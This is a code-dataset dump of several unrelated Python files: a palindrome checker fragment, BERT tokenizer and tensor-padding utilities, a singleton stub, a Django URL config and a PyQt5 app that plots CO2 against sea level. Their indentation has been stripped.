v = raw_input('calclulating ... %43')
v = raw_input('calclulating ... %50')
v = raw_input('calclulating ... %62')
v = raw_input('calclulating ... %74')
v = raw_input('calclulating ... %86')
v = raw_input('calclulating ... %99')
l = raw_input('Done!')
n = raw_input('Press ENTER for your result.')
for letter in d:
p.append(letter)
p.reverse()
for letter in d:
g.append(letter)
if p == g:
print d,'is a palandrome'
elif p != g:
print d,'is not a palandrome'
a = raw_input('yould you like me to calclulate another word? (yes or no)')
if a == 'yes':
print 'ok!'
elif a == 'no':
print 'ok!'
loop_control = False | 4.1875 | 4 |
utils/data_util.py | yuejiaxiang/semEvel2020_task8 | 0 | 12770047 | <gh_stars>0
import re
import unicodedata
import numpy as np
import torch
def get_ner_BIO(label_list):
# list_len = len(word_list)
# assert(list_len == len(label_list)), "word list size unmatch with label list"
list_len = len(label_list)
begin_label = 'B'
inside_label = 'I'
whole_tag = ''
index_tag = ''
tag_list = []
stand_matrix = []
for i in range(0, list_len):
# wordlabel = word_list[i]
current_label = label_list[i].upper()
if begin_label in current_label:
if index_tag == '':
# whole_tag = 'answer' + '[' + str(i)
whole_tag = '[' + str(i)
index_tag = 'answer'
# whole_tag = current_label.replace(begin_label,"",1) +'[' +str(i)
# index_tag = current_label.replace(begin_label,"",1)
else:
tag_list.append(whole_tag + ',' + str(i-1))
# whole_tag = 'answer' + '[' + str(i)
whole_tag = '[' + str(i)
index_tag = 'answer'
# whole_tag = current_label.replace(begin_label,"",1) + '[' + str(i)
# index_tag = current_label.replace(begin_label,"",1)
elif inside_label in current_label:
if 'answer' == index_tag:
whole_tag = whole_tag
else:
if (whole_tag != '')&(index_tag != ''):
tag_list.append(whole_tag + ',' + str(i-1))
whole_tag = ''
index_tag = ''
else:
if (whole_tag != '')&(index_tag != ''):
tag_list.append(whole_tag + ',' + str(i-1))
whole_tag = ''
index_tag = ''
# if (whole_tag != '')&(index_tag != ''):
# tag_list.append(whole_tag)
if whole_tag !='' and ',' not in whole_tag:
tag_list.append(whole_tag + ',' + str(list_len - 1))
tag_list_len = len(tag_list)
for i in range(0, tag_list_len):
if len(tag_list[i]) > 0:
tag_list[i] = tag_list[i] + ']'
insert_list = reverse_style(tag_list[i])
stand_matrix.append(eval(insert_list))
return stand_matrix
def reverse_style(input_string):
target_position = input_string.index('[')
input_len = len(input_string)
output_string = input_string[target_position:input_len] + input_string[0:target_position]
return output_string
def is_string(s):
"""判断是否是字符串
"""
return isinstance(s, str)
def padding(seqs, is_float=False, batch_first=False):
lengths = [len(s) for s in seqs]
seqs = [torch.Tensor(s) for s in seqs]
batch_length = max(lengths)
seq_tensor = torch.FloatTensor(batch_length, len(seqs)).fill_(float(0)) if is_float \
else torch.LongTensor(batch_length, len(seqs)).fill_(0)
for i, s in enumerate(seqs):
end_seq = lengths[i]
seq_tensor[:end_seq, i].copy_(s[:end_seq])
if batch_first:
seq_tensor = seq_tensor.t()
return seq_tensor, lengths
def mpn_padding(seqs, label, class_num, is_float=False, use_bert=False):
lengths = [len(s) for s in seqs]
seqs = [torch.Tensor(s) for s in seqs]
batch_length = max(lengths)
o1_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
o2_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
for i, label_ in enumerate(label):
for attr in label_:
if use_bert:
o1_tensor[i, attr.value_pos_start + 1, attr.attr_type_id] = 1
o2_tensor[i, attr.value_pos_end, attr.attr_type_id] = 1
else:
o1_tensor[i, attr.value_pos_start, attr.attr_type_id] = 1
o2_tensor[i, attr.value_pos_end - 1, attr.attr_type_id] = 1
return o1_tensor, o2_tensor
def spo_padding(seqs, label, class_num, is_float=False, use_bert=False):
lengths = [len(s) for s in seqs]
seqs = [torch.Tensor(s) for s in seqs]
batch_length = max(lengths)
o1_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
o2_tensor = torch.FloatTensor(len(seqs), batch_length, class_num).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num).fill_(0)
for i, label_ in enumerate(label):
for po in label_:
if use_bert:
o1_tensor[i, po.object_start + 1, po.predict_type_id] = 1
o2_tensor[i, po.object_end, po.predict_type_id] = 1
else:
o1_tensor[i, po.object_start, po.predict_type_id] = 1
o2_tensor[i, po.object_end - 1, po.predict_type_id] = 1
return o1_tensor, o2_tensor
def _handle_pos_limit(pos, limit=30):
for i, p in enumerate(pos):
if p > limit:
pos[i] = limit
if p < -limit:
pos[i] = -limit
return [p + limit + 1 for p in pos]
def find_position(entity_name, text):
start = text.find(entity_name, 0)
return start, start + len(entity_name)
class BasicTokenizer(object):
"""分词器基类
"""
def __init__(self, do_lower_case=False):
"""初始化
"""
self._token_pad = '[PAD]'
self._token_cls = '[CLS]'
self._token_sep = '[SEP]'
self._token_unk = '[UNK]'
self._token_mask = '[MASK]'
self._do_lower_case = do_lower_case
def tokenize(self, text, add_cls=True, add_sep=True, max_length=None):
"""分词函数
"""
if self._do_lower_case:
text = unicodedata.normalize('NFD', text)
text = ''.join(
[ch for ch in text if unicodedata.category(ch) != 'Mn'])
text = text.lower()
tokens = self._tokenize(text)
if add_cls:
tokens.insert(0, self._token_cls)
if add_sep:
tokens.append(self._token_sep)
if max_length is not None:
self.truncate_sequence(max_length, tokens, None, -2)
return tokens
def token_to_id(self, token):
"""token转换为对应的id
"""
raise NotImplementedError
def tokens_to_ids(self, tokens):
"""token序列转换为对应的id序列
"""
return [self.token_to_id(token) for token in tokens]
def truncate_sequence(self,
max_length,
first_sequence,
second_sequence=None,
pop_index=-1):
"""截断总长度
"""
if second_sequence is None:
second_sequence = []
while True:
total_length = len(first_sequence) + len(second_sequence)
if total_length <= max_length:
break
elif len(first_sequence) > len(second_sequence):
first_sequence.pop(pop_index)
else:
second_sequence.pop(pop_index)
def encode(self,
first_text,
second_text=None,
max_length=None,
first_length=None,
second_length=None):
"""输出文本对应token id和segment id
如果传入first_length,则强行padding第一个句子到指定长度;
同理,如果传入second_length,则强行padding第二个句子到指定长度。
"""
if is_string(first_text):
first_tokens = self.tokenize(first_text)
else:
first_tokens = first_text
if second_text is None:
second_tokens = None
elif is_string(second_text):
second_tokens = self.tokenize(second_text, add_cls=False)
else:
second_tokens = second_text
if max_length is not None:
self.truncate_sequence(max_length, first_tokens, second_tokens, -2)
first_token_ids = self.tokens_to_ids(first_tokens)
if first_length is not None:
first_token_ids = first_token_ids[:first_length]
first_token_ids.extend([self._token_pad_id] *
(first_length - len(first_token_ids)))
first_segment_ids = [0] * len(first_token_ids)
if second_text is not None:
second_token_ids = self.tokens_to_ids(second_tokens)
if second_length is not None:
second_token_ids = second_token_ids[:second_length]
second_token_ids.extend(
[self._token_pad_id] *
(second_length - len(second_token_ids)))
second_segment_ids = [1] * len(second_token_ids)
first_token_ids.extend(second_token_ids)
first_segment_ids.extend(second_segment_ids)
return first_token_ids, first_segment_ids
def id_to_token(self, i):
"""id序列为对应的token
"""
raise NotImplementedError
def ids_to_tokens(self, ids):
"""id序列转换为对应的token序列
"""
return [self.id_to_token(i) for i in ids]
def decode(self, ids):
"""转为可读文本
"""
raise NotImplementedError
def _tokenize(self, text):
"""基本分词函数
"""
raise NotImplementedError
class Tokenizer(BasicTokenizer):
"""Bert原生分词器
纯Python实现,代码修改自keras_bert的tokenizer实现
"""
def __init__(self, token_dict, do_lower_case=False):
"""初始化
"""
super(Tokenizer, self).__init__(do_lower_case)
if is_string(token_dict):
token_dict = load_vocab(token_dict)
self._token_dict = token_dict
self._token_dict_inv = {v: k for k, v in token_dict.items()}
for token in ['pad', 'cls', 'sep', 'unk', 'mask']:
try:
_token_id = token_dict[getattr(self, '_token_%s' % token)]
setattr(self, '_token_%s_id' % token, _token_id)
except:
pass
self._vocab_size = len(token_dict)
def token_to_id(self, token):
"""token转换为对应的id
"""
return self._token_dict.get(token, self._token_unk_id)
def id_to_token(self, i):
"""id转换为对应的token
"""
return self._token_dict_inv[i]
def decode(self, ids, tokens=None):
"""转为可读文本
"""
tokens = tokens or self.ids_to_tokens(ids)
tokens = [token for token in tokens if not self._is_special(token)]
text, flag = '', False
for i, token in enumerate(tokens):
if token[:2] == '##':
text += token[2:]
elif len(token) == 1 and self._is_cjk_character(token):
text += token
elif len(token) == 1 and self._is_punctuation(token):
text += token
text += ' '
elif i > 0 and self._is_cjk_character(text[-1]):
text += token
else:
text += ' '
text += token
text = re.sub(' +', ' ', text)
text = re.sub('\' (re|m|s|t|ve|d|ll) ', '\'\\1 ', text)
punctuation = self._cjk_punctuation() + '+-/={(<['
punctuation_regex = '|'.join([re.escape(p) for p in punctuation])
punctuation_regex = '(%s) ' % punctuation_regex
text = re.sub(punctuation_regex, '\\1', text)
text = re.sub('(\d\.) (\d)', '\\1\\2', text)
return text.strip()
def _tokenize(self, text):
"""基本分词函数
"""
spaced = ''
for ch in text:
if self._is_punctuation(ch) or self._is_cjk_character(ch):
spaced += ' ' + ch + ' '
elif self._is_space(ch):
spaced += ' '
elif ord(ch) == 0 or ord(ch) == 0xfffd or self._is_control(ch):
continue
else:
spaced += ch
tokens = []
for word in spaced.strip().split():
tokens.extend(self._word_piece_tokenize(word))
return tokens
def _word_piece_tokenize(self, word):
"""word内分成subword
"""
if word in self._token_dict:
return [word]
tokens = []
start, stop = 0, 0
while start < len(word):
stop = len(word)
while stop > start:
sub = word[start:stop]
if start > 0:
sub = '##' + sub
if sub in self._token_dict:
break
stop -= 1
if start == stop:
stop += 1
tokens.append(sub)
start = stop
return tokens
@staticmethod
def _is_space(ch):
"""空格类字符判断
"""
return ch == ' ' or ch == '\n' or ch == '\r' or ch == '\t' or \
unicodedata.category(ch) == 'Zs'
@staticmethod
def _is_punctuation(ch):
"""标点符号类字符判断(全/半角均在此内)
"""
code = ord(ch)
return 33 <= code <= 47 or \
58 <= code <= 64 or \
91 <= code <= 96 or \
123 <= code <= 126 or \
unicodedata.category(ch).startswith('P')
@staticmethod
def _cjk_punctuation():
return u'\uff02\uff03\uff04\uff05\uff06\uff07\uff08\uff09\uff0a\uff0b\uff0c\uff0d\uff0f\uff1a\uff1b\uff1c\uff1d\uff1e\uff20\uff3b\uff3c\uff3d\uff3e\uff3f\uff40\uff5b\uff5c\uff5d\uff5e\uff5f\uff60\uff62\uff63\uff64\u3000\u3001\u3003\u3008\u3009\u300a\u300b\u300c\u300d\u300e\u300f\u3010\u3011\u3014\u3015\u3016\u3017\u3018\u3019\u301a\u301b\u301c\u301d\u301e\u301f\u3030\u303e\u303f\u2013\u2014\u2018\u2019\u201b\u201c\u201d\u201e\u201f\u2026\u2027\ufe4f\ufe51\ufe54\xb7\uff01\uff1f\uff61\u3002'
@staticmethod
def _is_cjk_character(ch):
"""CJK类字符判断(包括中文字符也在此列)
参考:https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
"""
code = ord(ch)
return 0x4E00 <= code <= 0x9FFF or \
0x3400 <= code <= 0x4DBF or \
0x20000 <= code <= 0x2A6DF or \
0x2A700 <= code <= 0x2B73F or \
0x2B740 <= code <= 0x2B81F or \
0x2B820 <= code <= 0x2CEAF or \
0xF900 <= code <= 0xFAFF or \
0x2F800 <= code <= 0x2FA1F
@staticmethod
def _is_control(ch):
"""控制类字符判断
"""
return unicodedata.category(ch) in ('Cc', 'Cf')
@staticmethod
def _is_special(ch):
"""判断是不是有特殊含义的符号
"""
return bool(ch) and (ch[0] == '[') and (ch[-1] == ']')
def load_vocab(dict_path, encoding='utf-8', simplified=False, startwith=None):
"""从bert的词典文件中读取词典
"""
token_dict = {}
with open(dict_path, encoding=encoding) as reader:
for line in reader:
token = line.strip()
token_dict[token] = len(token_dict)
if simplified: # 过滤冗余部分token
new_token_dict, keep_tokens = {}, []
startwith = startwith or []
for t in startwith:
new_token_dict[t] = len(new_token_dict)
keep_tokens.append(token_dict[t])
for t, _ in sorted(token_dict.items(), key=lambda s: s[1]):
if t not in new_token_dict:
keep = True
if len(t) > 1:
for c in (t[2:] if t[:2] == '##' else t):
if (Tokenizer._is_cjk_character(c)
or Tokenizer._is_punctuation(c)):
keep = False
break
if keep:
new_token_dict[t] = len(new_token_dict)
keep_tokens.append(token_dict[t])
return new_token_dict, keep_tokens
else:
return token_dict
def search(pattern, sequence):
"""从sequence中寻找子串pattern
如果找到,返回第一个下标;否则返回-1。
"""
n = len(pattern)
for i in range(len(sequence)):
if sequence[i:i + n] == pattern:
return i
return -1
def sequence_padding(inputs, length=None, padding=0, is_float=False):
"""Numpy函数,将序列padding到同一长度
"""
if length is None:
length = max([len(x) for x in inputs])
outputs = np.array([
np.concatenate([x, [padding] * (length - len(x))])
if len(x) < length else x[:length] for x in inputs
])
out_tensor = torch.FloatTensor(outputs) if is_float \
else torch.LongTensor(outputs)
return torch.tensor(out_tensor)
def batch_gather(data: torch.Tensor, index: torch.Tensor):
length = index.shape[0]
t_index = index.cpu().numpy()
t_data = data.cpu().data.numpy()
result = []
for i in range(length):
result.append(t_data[i, t_index[i], :])
return torch.from_numpy(np.array(result)).to(data.device)
def select_padding(seqs, select, is_float=False, class_num=None):
lengths = [len(s) for s in seqs]
batch_length = max(lengths)
seq_tensor = torch.FloatTensor(len(seqs), batch_length, class_num, batch_length).fill_(float(0)) if is_float \
else torch.LongTensor(len(seqs), batch_length, class_num, batch_length).fill_(0)
# NA = BAIDU_SELECT['NA']
# seq_tensor[:, :, NA, :] = 1
for i, triplet_list in enumerate(select):
for triplet in triplet_list:
subject_pos = triplet[0]
object_pos = triplet[1]
predicate = triplet[2]
seq_tensor[i, subject_pos, predicate, object_pos] = 1
# seq_tensor[i, subject_pos, NA, object_pos] = 0
return seq_tensor
if __name__=='__main__':
a = ['O', 'B', 'I', 'I', 'O', 'O', 'O', 'B', 'I']
print(get_ner_BIO(a)) | 2.5 | 2 |
bookstore/src/cart/dummy.py | mehulk99/Online-Book-Store | 1 | 12770048 | <gh_stars>1-10
class SomeSingleton(object):
__instance__ = None
def __new__(cls, *args,**kwargs):
if SomeSingleton.__instance__ is None:
SomeSingleton.__instance__ = object.__new__(cls)
return SomeSingleton.__instance__
def __init__(self,f=0,y=0):
self.f = f
self.y= y
def some_func(self,arg):
pass
if __name__== "__main__":
s = SomeSingleton("343","43443")
| 3.265625 | 3 |
zeus/urls.py | flyliufu/PythonDemo | 0 | 12770049 | from django.urls import path
from . import views
app_name = 'zeus'
urlpatterns = [
path('token', views.token, name='token'),
]
| 1.5625 | 2 |
Mac/graph1.py | Vishu26/Hydrological-Cycle | 0 | 12770050 | <filename>Mac/graph1.py
from grap import Ui_Form
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from sys import argv
from PyQt5.QtWidgets import *
import matplotlib as mpl
mpl.use('Qt5Agg')
import matplotlib.pyplot as plt
import numpy as np
class mas(QWidget, Ui_Form):
def __init__(self):
super(mas, self).__init__()
self.setupUi(self)
self.step = 2
self.seax = [1990]
self.seay = [-20]
self.cy = [278]
self.conc = 278
self.ppm.valueChanged.connect(self.se)
self.forward.clicked.connect(self.go)
self.time.currentIndexChanged.connect(self.t)
self.reset.clicked.connect(self.re)
self.expo.clicked.connect(self.exp)
fig, self.ax1 = plt.subplots()
self.ax1.plot(self.seax, self.seay, '*', color='r')
self.ax1.axis([1980, 2110, -30, 100])
self.ax1.xaxis.grid()
self.ax1.yaxis.grid()
self.ax1.set_facecolor('gray')
self.ax1.set_ylabel('Relative Sea Level (mm)')
self.ax1.yaxis.label.set_color('red')
self.ax1.tick_params(axis='y', colors='red')
self.ax2 = self.ax1.twinx()
self.ax2.plot(self.seax, self.cy, '^', color='b')
self.ax2.axis([1980, 2110, 268, 1200])
self.ax2.xaxis.grid()
self.ax2.set_ylabel('Concentration of Carbon Dioxide (PPM)')
self.ax2.yaxis.label.set_color('blue')
self.ax2.tick_params(axis='y', colors='blue')
self.ax1.set_xlabel('Date (Year)')
plt.savefig('fig.png')
self.graph.setPixmap(QPixmap('fig.png'))
self.show()
def exp(self):
with open('graph.txt', 'w') as f:
f.write('Date, CO2, Sea Level\n')
for i in range(len(self.cy)):
f.write(str(self.seax[i])+', '+str(self.cy[i])+', '+str(self.seay[i])+'\n')
def t(self):
self.step = int(self.time.currentText().split()[0])
def re(self):
self.hide()
self.__init__()
def se(self):
self.conc = self.ppm.value()
self.val.setText(str(self.conc)+' ppm')
def go(self):
self.cy.append(self.conc)
self.seax.append(self.seax[-1] + self.step)
if self.seax[-1] >= 2110:
self.forward.setDisabled(True)
return
x = np.log(self.conc/278)
if x < 0.4:
self.seay.append(85 * x - 20)
elif x >= 0.4 and x <= 0.9:
self.seay.append(14)
else:
self.seay.append(400 * (x ** 2) - 800 * x + 414)
self.ax1.plot(self.seax, self.seay, '*', color='r')
self.ax2.plot(self.seax, self.cy, '^', color='b')
plt.savefig('fig.png')
self.graph.setPixmap(QPixmap('fig.png'))
if __name__ =='__main__':
app = QApplication(argv)
m = mas()
app.exec_() | 2.453125 | 2 |